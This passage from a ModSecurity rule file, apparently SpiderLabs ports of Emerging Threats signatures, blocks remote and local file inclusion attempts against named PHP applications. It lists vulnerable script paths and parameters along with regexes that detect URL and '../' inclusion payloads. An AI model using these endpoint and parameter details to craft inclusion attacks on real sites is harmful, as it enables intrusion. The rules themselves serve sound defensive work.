WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:fileName "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS F5 Data Manager ViewInventoryErrorReport.do Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010359) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FSphp FSphp.php FSPHP_LIB Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/FSphp.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010359,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FSphp FSphp.php FSPHP_LIB Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/9720'" SecRule &TX:'/RFI.*ARGS:FSPHP_LIB/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FSphp FSphp.php FSPHP_LIB Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010360) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FSphp navigation.php FSPHP_LIB Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/navigation.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010360,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FSphp navigation.php FSPHP_LIB Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/9720'" SecRule &TX:'/RFI.*ARGS:FSPHP_LIB/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FSphp navigation.php FSPHP_LIB Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010361) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FSphp pathwirte.php FSPHP_LIB Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /lib/pathwirte.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010361,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FSphp pathwirte.php FSPHP_LIB Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/9720'" SecRule &TX:'/RFI.*ARGS:FSPHP_LIB/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FSphp pathwirte.php FSPHP_LIB Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009506) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /sitemap.xml.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009506,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:dir[classes]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009507) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /sitemap.xml.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009507,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:dir[classes] "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Falcon Series One sitemap.xml.php dir Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011096) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fatwiki datumscalc.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /datumscalc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011096,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Fatwiki datumscalc.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:kal_class_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fatwiki datumscalc.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011097) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Fatwiki monatsblatt.php Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /monatsblatt.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011097,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Fatwiki monatsblatt.php Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:kal_class_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Fatwiki monatsblatt.php Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003690) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Firefly Remote Inclusion Attempt -- config.php DOCUMENT_ROOT SecRule REQUEST_LINE "@contains /modules/admin/include/config.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003690,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS Firefly Remote Inclusion Attempt -- config.php DOCUMENT_ROOT',tag:'web-application-attack',tag:'url,www.frsirt.com/english/advisories/2007/1554'" SecRule &TX:'/RFI.*ARGS:DOCUMENT_ROOT/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Firefly Remote Inclusion Attempt -- config.php DOCUMENT_ROOT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009745) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /pmscript.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009745,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34734'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:with "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Flatchat pmscript.php with Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010484) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FormMailer formmailer.admin.inc.php BASE_DIR Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /modules/formmailer/formmailer.admin.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010484,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS FormMailer formmailer.admin.inc.php BASE_DIR Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:BASE_DIR[jax_formmailer]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FormMailer formmailer.admin.inc.php BASE_DIR Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008878) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion SecRule REQUEST_LINE "@contains /init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008878,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:API_HOME_DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008879) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /init.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008879,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:API_HOME_DIR/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Free Directory Script 1.1.1 API_HOME_DIR parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009652) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /includes/startmodules.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009652,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion',tag:'web-application-attack',tag:'bugtraq,34538'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:lang_file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS FreeWebShop startmodules.inc.php lang_file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009163) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GBook header.php abspath Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009163,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS GBook header.php abspath Parameter Remote File Inclusion',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:abspath/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GBook header.php abspath Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2010096) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GROUP-E head_auth.php CFG Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /www/lib/head_auth.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2010096,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS GROUP-E head_auth.php CFG Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28024'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CFG[PREPEND_FILE]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GROUP-E head_auth.php CFG Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011018) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Gallery2 adodb-error.inc.php ADODB_LANG Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /gallery2/lib/adodb/adodb-error.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011018,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Gallery2 adodb-error.inc.php ADODB_LANG Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/10705'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:ADODB_LANG/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Gallery2 adodb-error.inc.php ADODB_LANG Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011116) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Gallo gfw_smarty.php gfwroot Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /core/includes/gfw_smarty.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011116,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS Gallo gfw_smarty.php gfwroot Parameter Remote File Inclusion Attempt',tag:'web-application-attack',tag:'bugtraq,39890'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[gfwroot]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Gallo gfw_smarty.php gfwroot Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2002996) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS GeekLog Remote File Include Vulnerability SecRule REQUEST_LINE "@contains .php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2002996,rev:6,msg:'SLR: ET WEB_SPECIFIC_APPS GeekLog Remote File Include Vulnerability',tag:'web-application-attack'" SecRule QUERY_STRING|REQUEST_BODY "(?i:_CONF\[.*\]=(http|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS GeekLog Remote File Include Vulnerability',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2003333) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS PHP Gnopaster Common.php remote file include SecRule REQUEST_LINE "@contains /includes/common.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2003333,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS PHP Gnopaster Common.php remote file include',tag:'web-application-attack',tag:'bugtraq,18180'" SecRule QUERY_STRING|REQUEST_BODY "(?i:root_path=\s*(ftps?|https?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS PHP Gnopaster Common.php remote file include',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009733) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Golabi index_logged.php cur_module Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /index_logged.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009733,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Golabi index_logged.php cur_module Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,33916'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:cur_module/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Golabi index_logged.php cur_module Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009427) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Grape Web Statistics functions.php location Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /functions.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009427,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Grape Web Statistics functions.php location Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28838'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:location/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Grape Web Statistics functions.php location Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008937) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion SecRule REQUEST_LINE "@contains /library/setup/rpc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008937,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.milw0rm.com/exploits/7344'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:objectname/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS gravity-gtd rpc.php objectname parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009231) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File Inclusion SecRule REQUEST_LINE "@contains /includes/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009231,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-2898'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:c_temp_path "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009232) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/footer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009232,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-2898'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:c_temp_path=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hedgehog CMS footer.php c_temp_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009233) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion SecRule REQUEST_LINE "@contains /includes/header.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009233,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion',tag:'web-application-attack',tag:'cve,CVE-2008-2898'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:c_temp_path=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Hedgehog CMS header.php c_temp_path Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009398) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HoMaP plugin_admin.php _settings Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /plugin_admin.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009398,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS HoMaP plugin_admin.php _settings Parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,29877'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:_settings[pluginpath]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HoMaP plugin_admin.php _settings Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011161) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS HotNews hnmain.inc.php3 incdir Parameter Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /includes/hnmain.inc.php3" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2011161,rev:2,msg:'SLR: ET WEB_SPECIFIC_APPS HotNews hnmain.inc.php3 incdir Parameter Remote File Inclusion Attempt',tag:'web-application-attack'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:config[incdir]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS HotNews hnmain.inc.php3 incdir Parameter Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008964) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /portal_block.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008964,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32647'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:phpbb_root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS lcxBBportal Alpha portal_block.php phpbb_root_path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2008965) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /acp_lcxbbportal.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008965,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,32647'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:phpbb_root_path/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS lcxBBportal Alpha acp_lcxbbportal.php phpbb_root_path parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009381) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Interact embedforum.php Remote File Inclusion SecRule REQUEST_LINE "@contains /embedforum.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009381,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Interact embedforum.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28996'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CONFIG[LANGUAGE_CPATH]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Interact embedforum.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2009386) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Interact lib.inc.php Remote File Inclusion SecRule REQUEST_LINE "@contains /scorm/lib.inc.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009386,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Interact lib.inc.php Remote File Inclusion',tag:'web-application-attack',tag:'bugtraq,28996'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule &TX:'/RFI.*ARGS:CONFIG[BASE_PATH]/' "@gt 0" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Interact lib.inc.php Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK/RFI-%{matched_var_name}=%{matched_var}'" # (2011140) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS JE Ajax Event Calendar view Parameter Local File Inclusion Attempt SecRule REQUEST_LINE "@contains /index.php" 